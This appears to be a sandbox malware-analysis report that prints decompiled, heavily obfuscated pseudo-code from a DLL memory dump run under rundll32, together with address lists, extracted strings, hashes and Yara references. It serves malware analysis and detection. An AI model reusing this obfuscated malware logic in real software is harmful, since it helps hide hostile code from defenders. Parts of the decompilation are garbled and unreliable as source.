				_v76 = 0xb984;
				_v76 = _v76 >> 7;
				_v76 = _v76 >> 3;
				_v76 = _v76 ^ 0x00004dee;
				_v20 = 0x7b92;
				_v20 = _v20 ^ 0xf2f83f86;
				_v20 = _v20 ^ 0xf2f807e2;
				_v80 = 0xc207;
				_v80 = _v80 << 6;
				_v80 = _v80 << 4;
				_v80 = _v80 ^ 0x03085a6d;
				_v100 = 0xacd7;
				_v100 = _v100 << 5;
				_v100 = _v100 + 0xc742;
				_v100 = _v100 << 2;
				_v100 = _v100 ^ 0x0059c334;
				_v104 = 0xa024;
				_v104 = _v104 * 0x6a;
				_v104 = _v104 ^ 0xed0f46bd;
				_v104 = _v104 * 0x6a;
				_v104 = _v104 ^ 0x41e55215;
				_v12 = 0x367e;
				_v12 = _v12 + 0xfffff6be;
				_v12 = _v12 ^ 0x000007d5;
				_v72 = 0xa28f;
				_v72 = _v72 << 0xc;
				_v72 = _v72 + 0xffffb212;
				_v72 = _v72 ^ 0x0a288cff;
				_v108 = 0xea86;
				_v108 = _v108 ^ 0x071afcb5;
				_v108 = _v108 + 0xffffbc40;
				_v108 = _v108 | 0x45b90834;
				_v108 = _v108 ^ 0x47b9da77;
				_v124 = 0xcf51;
				_v124 = _v124 + 0xffff4c58;
				_v124 = _v124 + 0xb8c6;
				_v124 = _v124 >> 1;
				_v124 = _v124 ^ 0x00006a37;
				_v112 = 0x31d2;
				_v112 = _v112 * 0x13;
				_v112 = _v112 >> 4;
				_v112 = _v112 >> 4;
				_v112 = _v112 ^ 0x000003b2;
				while(1) {
					_t285 = 0x1f2fa20f;
					while(1) {
						L2:
						_t352 = _t308 - 0x2fb99d0d;
						if(_t352 > 0) {
							break;
						}
						if(_t352 == 0) {
							_t344 = _v108;
							_t336 = _v8;
							_v4 = _t344;
							if(_t336 != 0) {
								do {
									_t332 = _v28;
									_t298 = E1001D52C(_v24, _v28, _v32, _t336 + 0x18, _v36);
									_t336 =  *((intOrPtr*)(_t336 + 0xc));
									_t350 =  &(_t350[3]);
									_t344 = _t344 + 1 + _t298;
								} while (_t336 != 0);
								_v4 = _t344;
								_t285 = 0x1f2fa20f;
							}
							_t308 = 0x1ed510c3;
							goto L13;
						} else {
							if(_t308 == 0x1c36e0b9) {
								 *(_t335 + 4) = _v112;
								_t332 = _t348;
								_t288 = E10010950(_t348, _v44, _t305 - 1, _t335 + 4, _v84, _v48);
								_t350 =  &(_t350[5]);
								 *_t335 = _t288;
								_t308 = 0x3a102d2c;
								while(1) {
									_t285 = 0x1f2fa20f;
									goto L2;
								}
							} else {
								if(_t308 == 0x1ed510c3) {
									_push(_t308);
									_t348 = E1000A0AD(_t344 + _t344, _t332);
									_t285 = 0x1f2fa20f;
									_t308 =  !=  ? 0x1f2fa20f : 0x39df803e;
									continue;
								} else {
									if(_t308 == _t285) {
										_t305 = _v124;
										_t337 = _v8;
										if(_t337 != 0) {
											do {
												E1001103F(_v64, _v68, _t305 * 2 + _t348, _t337 + 0x18);
												_t332 = _v60;
												_t295 = E1001D52C(_v56, _v60, _v116, _t337 + 0x18, _v120);
												_t350 =  &(_t350[5]);
												_t306 = _t305 + _t295;
												_t296 = 0x2c;
												 *((short*)(_t348 + _t306 * 2)) = _t296;
												_t305 = _t306 + 1;
												_t337 =  *((intOrPtr*)(_t337 + 0xc));
											} while (_t337 != 0);
											_t285 = 0x1f2fa20f;
										}
										_t344 = _v4;
										_t308 = 0x1c36e0b9;
										L13:
										_t335 = _a8;
										continue;
									} else {
										if(_t308 != 0x2f82b8df) {
											L25:
											if(_t308 != 0x2348fa2c) {
												continue;
											} else {
											}
										} else {
											_t332 = E1000A16A;
											E1000F54C(E1000A16A,  &_v8, _v96);
											_t308 = 0x2fb99d0d;
											while(1) {
												_t285 = 0x1f2fa20f;
												goto L2;
											}
										}
									}
								}
							}
						}
						L30:
						return 0 |  *_t335 != 0x00000000;
					}
					if(_t308 == 0x34e0d7ad) {
						_t308 = 0x2f82b8df;
						goto L25;
					} else {
						if(_t308 == 0x39df803e) {
							_t338 = _v8;
							if(_t338 != 0) {
								do {
									_t346 =  *(_t338 + 0xc);
									E100033F4(_v100, _v104, _v12, _v72, _t338);
									_t350 =  &(_t350[3]);
									_t338 = _t346;
								} while (_t346 != 0);
							}
							_t335 = _a8;
						} else {
							if(_t308 != 0x3a102d2c) {
								goto L25;
							} else {
								_t332 = _v76;
								E100033F4(_v16, _v76, _v20, _v80, _t348);
								_t350 =  &(_t350[3]);
								_t308 = 0x39df803e;
								continue;
							}
						}
					}
					goto L30;
				}
			}

0x10006b03
0x10006b0a
0x10006b11
0x10006b12
0x10006b19
0x10006b1a
0x10006b1b
0x10006b20
0x10006b28
0x10006b2b
0x10006b35
0x10006b3d
0x10006b49
0x10006b4c
0x10006b50
0x10006b58
0x10006b60
0x10006b68
0x10006b70
0x10006b78
0x10006b80
0x10006b88
0x10006b90
0x10006b9d
0x10006ba1
0x10006ba9
0x10006bb1
0x10006bb9
0x10006bc1
0x10006bc9
0x10006bce
0x10006bd3
0x10006be3
0x10006be7
0x10006bef
0x10006bf7
0x10006bff
0x10006c07
0x10006c14
0x10006c17
0x10006c1b
0x10006c20
0x10006c28
0x10006c30
0x10006c38
0x10006c40
0x10006c48
0x10006c50
0x10006c58
0x10006c60
0x10006c65
0x10006c6d
0x10006c7d
0x10006c81
0x10006c86
0x10006c92
0x10006c95
0x10006c99
0x10006ca1
0x10006ca9
0x10006cb1
0x10006cb9
0x10006cc1
0x10006cc8
0x10006cd0
0x10006cd8
0x10006ce7
0x10006cea
0x10006cf1
0x10006cf5
0x10006cfd
0x10006d0a
0x10006d11
0x10006d15
0x10006d1d
0x10006d2d
0x10006d31
0x10006d39
0x10006d44
0x10006d4b
0x10006d4c
0x10006d4e
0x10006d55
0x10006d59
0x10006d61
0x10006d69
0x10006d6e
0x10006d73
0x10006d7b
0x10006d83
0x10006d8b
0x10006d93
0x10006d9b
0x10006da0
0x10006da5
0x10006dad
0x10006db5
0x10006dba
0x10006dc2
0x10006dc7
0x10006dcf
0x10006ddc
0x10006de0
0x10006ded
0x10006df1
0x10006df9
0x10006e04
0x10006e0f
0x10006e1a
0x10006e22
0x10006e27
0x10006e2f
0x10006e37
0x10006e3f
0x10006e47
0x10006e4f
0x10006e57
0x10006e5f
0x10006e67
0x10006e6f
0x10006e77
0x10006e7b
0x10006e83
0x10006e90
0x10006e94
0x10006e99
0x10006e9e
0x10006ea6
0x10006ea6
0x10006eab
0x10006eab
0x10006eab
0x10006eb1
0x00000000
0x00000000
0x10006eb7
0x10006fd6
0x10006fda
0x10006fe1
0x10006fea
0x10006fec
0x10006ff8
0x10007003
0x10007008
0x1000700c
0x1000700f
0x10007011
0x10007015
0x1000701c
0x1000701c
0x10007021
0x00000000
0x10006ebd
0x10006ec3
0x10006fad
0x10006faf
0x10006fc2
0x10006fc7
0x10006fca
0x10006fcc
0x10006ea6
0x10006ea6
0x00000000
0x10006ea6
0x10006ec9
0x10006ecf
0x10006f82
0x10006f8b
0x10006f8d
0x10006f9a
0x00000000
0x10006ed5
0x10006ed7
0x10006f08
0x10006f0c
0x10006f15
0x10006f17
0x10006f2d
0x10006f3b
0x10006f43
0x10006f48
0x10006f4b
0x10006f4f
0x10006f50
0x10006f55
0x10006f56
0x10006f59
0x10006f5d
0x10006f5d
0x10006f62
0x10006f69
0x10006f6e
0x10006f6e
0x00000000
0x10006ed9
0x10006edf
0x10007071
0x10007077
0x00000000
0x00000000
0x1000707d
0x10006ee5
0x10006ef5
0x10006efa
0x10006f01
0x10006ea6
0x10006ea6
0x00000000
0x10006ea6
0x10006ea6
0x10006edf
0x10006ed7
0x10006ecf
0x10006ec3
0x100070b6
0x100070c4
0x100070c4
0x10007031
0x1000706c
0x00000000
0x10007033
0x10007039
0x1000707f
0x10007088
0x1000708a
0x1000708a
0x100070a1
0x100070a6
0x100070a9
0x100070ab
0x1000708a
0x100070af
0x1000703b
0x10007041
0x00000000
0x10007043
0x1000704f
0x1000705a
0x1000705f
0x10007062
0x00000000
0x10007062
0x10007041
0x10007039
0x00000000
0x10007031

Strings

M, xrefs: 10006D73
~6, xrefs: 10006DF9
0, xrefs: 10006CD8
zJ, xrefs: 10006C07
7j, xrefs: 10006E7B
C, xrefs: 10006C81
<, xrefs: 10006BCE
'0, xrefs: 10006D59

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: '0$0$7j$<$C$zJ$~6$M
API String ID: 0-3399841341
Opcode ID: cf03fe6d979fd07b6356a790678a3cf4236ed0a4cce6b6eaf59eca89b1d3ae7b
Instruction ID: 72b75e1f63acc2a2494924ef102e16105a0023bea14fb43c96f4ef88cdcecbb7
Opcode Fuzzy Hash: cf03fe6d979fd07b6356a790678a3cf4236ed0a4cce6b6eaf59eca89b1d3ae7b
Instruction Fuzzy Hash: E9E143715083818BE364CF25C489A4BBBE1FBC4798F60891DF5DA86260D7B5D949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1000F249, Relevance: 10.2, Strings: 8, Instructions: 165
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E1000F249(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* __ecx;
				void* _t147;
				signed int _t155;
				void* _t163;
				void* _t175;
				signed int _t186;
				signed int _t187;
				void* _t189;
				signed int* _t192;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E10017B8C(_t147);
				_v64 = 0x6370;
				_t192 =  &(( &_v68)[6]);
				_t189 = 0;
				_t175 = 0x20cb3b7c;
				_t186 = 0x50;
				_v64 = _v64 / _t186;
				_v64 = _v64 + 0xffff6f93;
				_v64 = _v64 + 0x1727;
				_v64 = _v64 ^ 0xffff87f9;
				_v8 = 0xefa2;
				_v8 = _v8 + 0x92fa;
				_v8 = _v8 ^ 0x0001829d;
				_v68 = 0xe664;
				_v68 = _v68 + 0xffff4887;
				_v68 = _v68 ^ 0x7005a05e;
				_v68 = _v68 >> 4;
				_v68 = _v68 ^ 0x470058eb;
				_v12 = 0x9c3d;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 ^ 0x40000013;
				_v36 = 0x5c64;
				_t187 = 0x2f;
				_v36 = _v36 * 0x31;
				_v36 = _v36 + 0xffff8dc4;
				_v36 = _v36 ^ 0x0011602a;
				_v40 = 0x2378;
				_v40 = _v40 + 0x33dd;
				_v40 = _v40 ^ 0x57ceadf8;
				_v40 = _v40 ^ 0x57ce856c;
				_v44 = 0xd91e;
				_v44 = _v44 * 0x4d;
				_v44 = _v44 + 0xffff99a5;
				_v44 = _v44 ^ 0x0040b8c1;
				_v48 = 0xcc60;
				_v48 = _v48 << 8;
				_v48 = _v48 | 0x85586571;
				_v48 = _v48 ^ 0x85dc6d39;
				_v20 = 0x1f66;
				_v20 = _v20 * 0x49;
				_v20 = _v20 ^ 0x0008c78a;
				_v24 = 0xe240;
				_v24 = _v24 | 0x77bc68e4;
				_v24 = _v24 ^ 0x77bcc1af;
				_v52 = 0x7eaa;
				_v52 = _v52 + 0x3327;
				_v52 = _v52 >> 9;
				_v52 = _v52 ^ 0x00004606;
				_v28 = 0x7379;
				_v28 = _v28 + 0x52bd;
				_v28 = _v28 | 0x801309ad;
				_v28 = _v28 ^ 0x8013d542;
				_v32 = 0x9e61;
				_v32 = _v32 * 0x1a;
				_t155 = _v32;
				_t184 = _t155 % _t187;
				_v32 = _t155 / _t187;
				_v32 = _v32 ^ 0x00001631;
				_v56 = 0x49bb;
				_v56 = _v56 * 0x27;
				_v56 = _v56 * 0x11;
				_v56 = _v56 ^ 0x4dea241e;
				_v56 = _v56 ^ 0x4d54a7a8;
				_v60 = 0xaa6f;
				_v60 = _v60 + 0xf40a;
				_v60 = _v60 + 0xffffbc79;
				_v60 = _v60 * 0x2e;
				_v60 = _v60 ^ 0x003e2151;
				_v16 = 0x3ac;
				_v16 = _v16 + 0xffff5293;
				_v16 = _v16 ^ 0xffff2a77;
				do {
					while(_t175 != 0x127933c4) {
						if(_t175 == 0x20cb3b7c) {
							_t175 = 0x127933c4;
							continue;
						} else {
							if(_t175 == 0x296afe8a) {
								_push(_t175);
								_t189 = E1000A0AD(_v4 + _v4, _t184);
								if(_t189 != 0) {
									_t175 = 0x2a2b031a;
									continue;
								}
							} else {
								if(_t175 != 0x2a2b031a) {
									goto L13;
								} else {
									E1001A13A(_v28, _v32, _v56,  &_v4, _a8, _v12 | _v8, _a16, _v60, _t189, _v16);
								}
							}
						}
						L6:
						return _t189;
					}
					_t184 = _v40;
					_t163 = E1001A13A(_v36, _v40, _v44,  &_v4, _a8, _v68 | _v64, _a16, _v48, 0, _v20);
					_t192 =  &(_t192[8]);
					if(_t163 == 0) {
						_t175 = 0xc3663ab;
						goto L13;
					} else {
						_t175 = 0x296afe8a;
						continue;
					}
					goto L6;
					L13:
				} while (_t175 != 0xc3663ab);
				goto L6;
			}

0x1000f250
0x1000f254
0x1000f258
0x1000f25c
0x1000f260
0x1000f262
0x1000f267
0x1000f26f
0x1000f278
0x1000f27a
0x1000f281
0x1000f286
0x1000f28c
0x1000f294
0x1000f29c
0x1000f2a4
0x1000f2ac
0x1000f2b4
0x1000f2bc
0x1000f2c4
0x1000f2cc
0x1000f2d4
0x1000f2d9
0x1000f2e1
0x1000f2e9
0x1000f2ee
0x1000f2f6
0x1000f303
0x1000f304
0x1000f308
0x1000f310
0x1000f318
0x1000f320
0x1000f328
0x1000f330
0x1000f338
0x1000f345
0x1000f349
0x1000f351
0x1000f359
0x1000f361
0x1000f366
0x1000f36e
0x1000f376
0x1000f383
0x1000f387
0x1000f38f
0x1000f397
0x1000f39f
0x1000f3a7
0x1000f3af
0x1000f3b7
0x1000f3bc
0x1000f3c4
0x1000f3cc
0x1000f3d4
0x1000f3dc
0x1000f3e4
0x1000f3f1
0x1000f3f5
0x1000f3f9
0x1000f3fb
0x1000f3ff
0x1000f407
0x1000f414
0x1000f42c
0x1000f430
0x1000f438
0x1000f440
0x1000f448
0x1000f450
0x1000f45d
0x1000f461
0x1000f469
0x1000f471
0x1000f479
0x1000f481
0x1000f481
0x1000f48b
0x1000f4f6
0x00000000
0x1000f48d
0x1000f48f
0x1000f4e2
0x1000f4eb
0x1000f4f0
0x1000f4f2
0x00000000
0x1000f4f2
0x1000f491
0x1000f493
0x00000000
0x1000f499
0x1000f4c4
0x1000f4c9
0x1000f493
0x1000f48f
0x1000f4cd
0x1000f4d5
0x1000f4d5
0x1000f51e
0x1000f526
0x1000f52b
0x1000f530
0x1000f539
0x00000000
0x1000f532
0x1000f532
0x00000000
0x1000f532
0x00000000
0x1000f53e
0x1000f53e
0x00000000

Strings

'3, xrefs: 1000F3AF
X, xrefs: 1000F2D9
ys, xrefs: 1000F3C4
d\, xrefs: 1000F2F6
x#, xrefs: 1000F318
Q!>, xrefs: 1000F461
@, xrefs: 1000F38F
Q!>X, xrefs: 1000F458

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: '3$@$Q!>$Q!>X$d\$x#$ys$X
API String ID: 0-3282412013
Opcode ID: f535d80aa6a69b6c4010f8fe8906834d63bc4782d879ed49cdf781dea3a2fa1e
Instruction ID: f349f5c3b3bf41da3820c07895fef6228566afdd576f1acf9707e66a0522a762
Opcode Fuzzy Hash: f535d80aa6a69b6c4010f8fe8906834d63bc4782d879ed49cdf781dea3a2fa1e
Instruction Fuzzy Hash: BF8120B15083419FE354CF21C88581FBBE4FBD8798F105A1DF585962A0D3B5CA4A9F83

Uniqueness

Uniqueness Score: -1.00%

Function 10001662, Relevance: 10.1, Strings: 8, Instructions: 112
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10001662(signed int __eax, void* _a8) {
				void* _v4;
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				signed char _t122;
				signed char _t153;

				_t122 = __eax | 0x00000036;
				_t153 = _t122;
			}

0x10001662
0x10001662

Strings

2R, xrefs: 100017F2
B+, xrefs: 100016DC
X0, xrefs: 10001755
2, xrefs: 100017B3
){, xrefs: 100017D6
xD, xrefs: 100016BC
fw, xrefs: 10001794
<S, xrefs: 10001699

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ){$2R$<S$B+$X0$fw$xD$2
API String ID: 0-3223740375
Opcode ID: c6dd70ef9f55ee37b0a97124bfc0c8a0a32db8edce1101d02b2e6271c8f3e925
Instruction ID: 30d3b5dca74138d70dc0cc879a69ce02fa9073ae1a1bfa2445115ae61da9892b
Opcode Fuzzy Hash: c6dd70ef9f55ee37b0a97124bfc0c8a0a32db8edce1101d02b2e6271c8f3e925
Instruction Fuzzy Hash: 0251DFB1C0161AEBDF19CFE5D98A4DEBFB1FB08354F208149E115762A0C3B90A55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 10001664, Relevance: 10.1, Strings: 8, Instructions: 111
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E10001664(void* __eflags, intOrPtr _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				signed int _t121;
				void* _t128;
				signed int _t129;
				void* _t138;
				signed int _t140;
				intOrPtr _t147;

				_push(_a12);
				asm("adc [ebx-0x67426], cl");
				if(__eflags == 0) {
					_push(_a4);
					_push(_t128);
					_push(_t138);
					_t121 = E10017B8C(_t121);
					_v64 = _v64 & 0x00000000;
				}
				asm("les eax, [eax]");
				_v60 = _v60 & 0x00000000;
				_v72 = 0x4ae200;
				_v68 = 0x4abafd;
				_v16 = 0x533c;
				_v16 = _v16 >> 0xf;
				asm("insd");
				asm("hlt");
				asm("packssdw mm0, [ebp-0xc]");
				 *0x0000005E =  *0x0000005E & _t140;
				_pop(_t129);
				_v16 = _t121;
				_v16 = _v16 ^ 0x26aaea9d;
				_v16 = _v16 ^ 0x26aa8f2c;
				_v12 = 0x4478;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 | 0x1765af23;
				_t24 =  &_v12;
				 *_t24 = _v12 + 0xffff9515;
				_t147 =  *_t24;
				do {
					asm("clc");
					asm("adc eax, 0x81ffff95");
				} while (_t147 != 0);
				_push(_t138);
				ss = ds;
				_v8 = 0x2b42;
				_v8 = _v8 | 0x5799a9d3;
				_v8 = _v8 << 2;
				_v8 = _v8 + 0xffff5a36;
				_v8 = _v8 ^ 0x5e663d8c;
				_v44 = 0xd35b;
				_v44 = _v44 | 0x117c34cb;
				_v44 = _v44 ^ 0x117cc8ab;
				_v24 = 0x4da6;
				_v24 = _v24 >> 0xa;
				_v24 = _v24 >> 7;
				_v24 = _v24 + 0xd231;
				_v24 = _v24 ^ 0x0000b683;
				_v52 = 0x5faf;
				_v52 = _v52 + 0x57dc;
				_v52 = _v52 ^ 0x000099ce;
				_v48 = 0x8933;
				_v48 = _v48 >> 0x10;
				_v48 = _v48 ^ 0x000048bd;
				_v20 = 0x3058;
				_v20 = _v20 + 0xffff746a;
				_v20 = _v20 | 0x2ad79710;
				_v20 = _v20 * 0x49;
				_v20 = _v20 ^ 0xffeb46e2;
				_v32 = 0x74cc;
				_v32 = _v32 | 0x83773cc8;
				_v32 = _v32 + 0xfffff44d;
				_v32 = _v32 ^ 0x83776f8a;
				_v40 = 0x7766;
				_v40 = _v40 / _t129;
				_v40 = _v40 << 3;
				_v40 = _v40 ^ 0x00005419;
				_v28 = 0x32e9;
				_v28 = _v28 + 0xffffebf9;
				_v28 = _v28 ^ 0x9fb6beb3;
				_v28 = _v28 | 0x13cc8936;
				_v28 = _v28 ^ 0x9ffef344;
				_v36 = 0x7b29;
				_v36 = _v36 ^ 0x9b8fc583;
				_v36 = _v36 | 0x6cca3ae9;
				_v36 = _v36 ^ 0xffcfb9e7;
				_v56 = 0x5232;
				_v56 = _v56 | 0xff7f4dd8;
				_v56 = _v56 ^ 0xff7f31ec;
				_push(_v44);
				_push(_v8);
				_push(_v12);
				E1000487B(_v52, _v56, 0x10001020, _v48, _v20, E1000B871(0x10001020, _v16, _v56), _t128, _a4, _v32, _t138);
				return E1000717B(_v40, _v28, _v36, _t125, _v56);
			}

0x1000166d
0x1000166f
0x10001675
0x10001677
0x1000167a
0x1000167b
0x1000167c
0x10001681
0x10001681
0x10001683
0x10001687
0x1000168b
0x10001692
0x10001699
0x100016a0
0x100016a1
0x100016a2
0x100016a3
0x100016a7
0x100016aa
0x100016ab
0x100016ae
0x100016b5
0x100016bc
0x100016c3
0x100016c7
0x100016ce
0x100016ce
0x100016ce
0x100016d0
0x100016d0
0x100016d1
0x100016d1
0x100016d8
0x100016da
0x100016dc
0x100016e3
0x100016ea
0x100016ee
0x100016f5
0x100016fc
0x10001703
0x1000170a
0x10001711
0x10001718
0x1000171c
0x10001720
0x10001727
0x1000172e
0x10001735
0x1000173c
0x10001743
0x1000174a
0x1000174e
0x10001755
0x1000175c
0x10001763
0x1000176e
0x10001771
0x10001778
0x1000177f
0x10001786
0x1000178d
0x10001794
0x100017a5
0x100017a8
0x100017ac
0x100017b3
0x100017ba
0x100017c1
0x100017c8
0x100017cf
0x100017d6
0x100017dd
0x100017e4
0x100017eb
0x100017f2
0x100017f9
0x10001800
0x10001807
0x1000180a
0x1000180d
0x10001833
0x10001853

Strings

2R, xrefs: 100017F2
B+, xrefs: 100016DC
X0, xrefs: 10001755
2, xrefs: 100017B3
){, xrefs: 100017D6
xD, xrefs: 100016BC
fw, xrefs: 10001794
<S, xrefs: 10001699

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ){$2R$<S$B+$X0$fw$xD$2
API String ID: 0-3223740375
Opcode ID: 473bcccf1896ebe5f8edd92d5bcdcf0215563bdbc87b01593283256b91b2ace3
Instruction ID: 5887b650992000fcf9e1b8cb807d5b10a93d61863999d477c7a9b9ab699873bb
Opcode Fuzzy Hash: 473bcccf1896ebe5f8edd92d5bcdcf0215563bdbc87b01593283256b91b2ace3
Instruction Fuzzy Hash: 4351DFB1C0161AEBDF09CFE5D98A4DEBFB1FB08354F208149E115762A0C3B90A55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 1000BA46, Relevance: 8.9, Strings: 7, Instructions: 197
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E1000BA46(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t182;
				signed int _t198;
				void* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				void* _t217;
				intOrPtr* _t236;
				void* _t237;
				signed int* _t240;

				_push(_a12);
				_t236 = _a8;
				_push(_t236);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10017B8C(_t182);
				_v56 = 0xe475;
				_t240 =  &(( &_v76)[5]);
				_v56 = _v56 + 0x15ec;
				_t237 = 0;
				_t217 = 0x3437af8d;
				_t209 = 0x27;
				_v56 = _v56 / _t209;
				_v56 = _v56 | 0x21f327c0;
				_v56 = _v56 ^ 0x21f327ea;
				_v32 = 0xdab6;
				_t210 = 0x4a;
				_v32 = _v32 * 0x38;
				_v32 = _v32 + 0xffffad8f;
				_v32 = _v32 ^ 0x002f855e;
				_v24 = 0x9509;
				_v24 = _v24 / _t210;
				_v24 = _v24 ^ 0x00006ae8;
				_v60 = 0x3b;
				_t211 = 0x54;
				_v60 = _v60 / _t211;
				_v60 = _v60 >> 2;
				_t212 = 0x29;
				_v60 = _v60 / _t212;
				_v60 = _v60 ^ 0x000067a1;
				_v64 = 0x1830;
				_v64 = _v64 ^ 0xf1740d63;
				_v64 = _v64 + 0x354a;
				_v64 = _v64 << 0xc;
				_v64 = _v64 ^ 0x44a9fcb1;
				_v68 = 0x866b;
				_v68 = _v68 << 4;
				_v68 = _v68 * 0x30;
				_v68 = _v68 ^ 0xd02cc9b5;
				_v68 = _v68 ^ 0xd1bfbfa6;
				_v72 = 0xf5bc;
				_v72 = _v72 + 0x3f06;
				_v72 = _v72 + 0xc584;
				_v72 = _v72 >> 5;
				_v72 = _v72 ^ 0x00001f43;
				_v28 = 0xd46c;
				_v28 = _v28 << 0xf;
				_v28 = _v28 ^ 0x6a3601fc;
				_v76 = 0xa035;
				_v76 = _v76 << 0xb;
				_v76 = _v76 >> 0x10;
				_v76 = _v76 ^ 0x430c5852;
				_v76 = _v76 ^ 0x430c7a61;
				_v48 = 0x898a;
				_v48 = _v48 >> 0xd;
				_v48 = _v48 >> 0xd;
				_v48 = _v48 * 0x7e;
				_v48 = _v48 ^ 0x00001f8c;
				_v52 = 0xb148;
				_v52 = _v52 >> 5;
				_v52 = _v52 + 0xfffff512;
				_v52 = _v52 << 9;
				_v52 = _v52 ^ 0xfff55ab3;
				_v8 = 0xe785;
				_v8 = _v8 << 8;
				_v8 = _v8 ^ 0x00e7fe94;
				_v12 = 0x1378;
				_t213 = 0xe;
				_v12 = _v12 * 0x3d;
				_v12 = _v12 ^ 0x0004d085;
				_v36 = 0x73f6;
				_v36 = _v36 + 0xc1b0;
				_v36 = _v36 << 6;
				_v36 = _v36 ^ 0x004d5d6f;
				_v40 = 0x9780;
				_v40 = _v40 ^ 0x79532350;
				_v40 = _v40 | 0x11ae6b19;
				_v40 = _v40 ^ 0x79ff967b;
				_v44 = 0x7c53;
				_v44 = _v44 / _t213;
				_t198 = _v44;
				_t214 = 0x73;
				_t234 = _t198 % _t214;
				_v44 = _t198 / _t214;
				_v44 = _v44 ^ 0x00001a1d;
				_v16 = 0x2427;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 ^ 0x0000550a;
				_v20 = 0x47be;
				_v20 = _v20 << 8;
				_v20 = _v20 ^ 0x0047a098;
				do {
					while(_t217 != 0xd024718) {
						if(_t217 == 0x25a35c91) {
							_push(_t217);
							E10014C5C(_v32, _v8, _v12, _v36, _v40, _a4, _v44, _t217, _t217, _v16, _v20,  &_v4, _t237);
							 *_t236 = _v4;
						} else {
							if(_t217 == 0x3254b9ac) {
								_push(_t217);
								_t234 = _v24;
								_t208 = E10014C5C(_v56, _v24, _v60, _v64, _v68, _a4, _v72, _t217, _t217, _v28, _v76,  &_v4, 0);
								_t240 =  &(_t240[0xc]);
								if(_t208 != 0) {
									_t217 = 0xd024718;
									continue;
								}
							} else {
								if(_t217 != 0x3437af8d) {
									goto L11;
								} else {
									_t217 = 0x3254b9ac;
									continue;
								}
							}
						}
						L14:
						return _t237;
					}
					_push(_t217);
					_t237 = E1000A0AD(_v4, _t234);
					if(_t237 == 0) {
						_t217 = 0xe639244;
						goto L11;
					} else {
						_t217 = 0x25a35c91;
						continue;
					}
					goto L14;
					L11:
				} while (_t217 != 0xe639244);
				goto L14;
			}

0x1000ba4d
0x1000ba51
0x1000ba55
0x1000ba56
0x1000ba5a
0x1000ba5b
0x1000ba5c
0x1000ba61
0x1000ba69
0x1000ba6c
0x1000ba7a
0x1000ba7c
0x1000ba83
0x1000ba88
0x1000ba8e
0x1000ba96
0x1000ba9e
0x1000baab
0x1000baae
0x1000bab2
0x1000baba
0x1000bac2
0x1000bad2
0x1000bad6
0x1000bade
0x1000baea
0x1000baef
0x1000baf5
0x1000bafe
0x1000bb01
0x1000bb05
0x1000bb0d
0x1000bb15
0x1000bb1d
0x1000bb25
0x1000bb2a
0x1000bb32
0x1000bb3a
0x1000bb44
0x1000bb48
0x1000bb50
0x1000bb58
0x1000bb60
0x1000bb68
0x1000bb70
0x1000bb75
0x1000bb7d
0x1000bb85
0x1000bb8a
0x1000bb92
0x1000bb9a
0x1000bb9f
0x1000bba4
0x1000bbac
0x1000bbb4
0x1000bbbc
0x1000bbc1
0x1000bbcb
0x1000bbcf
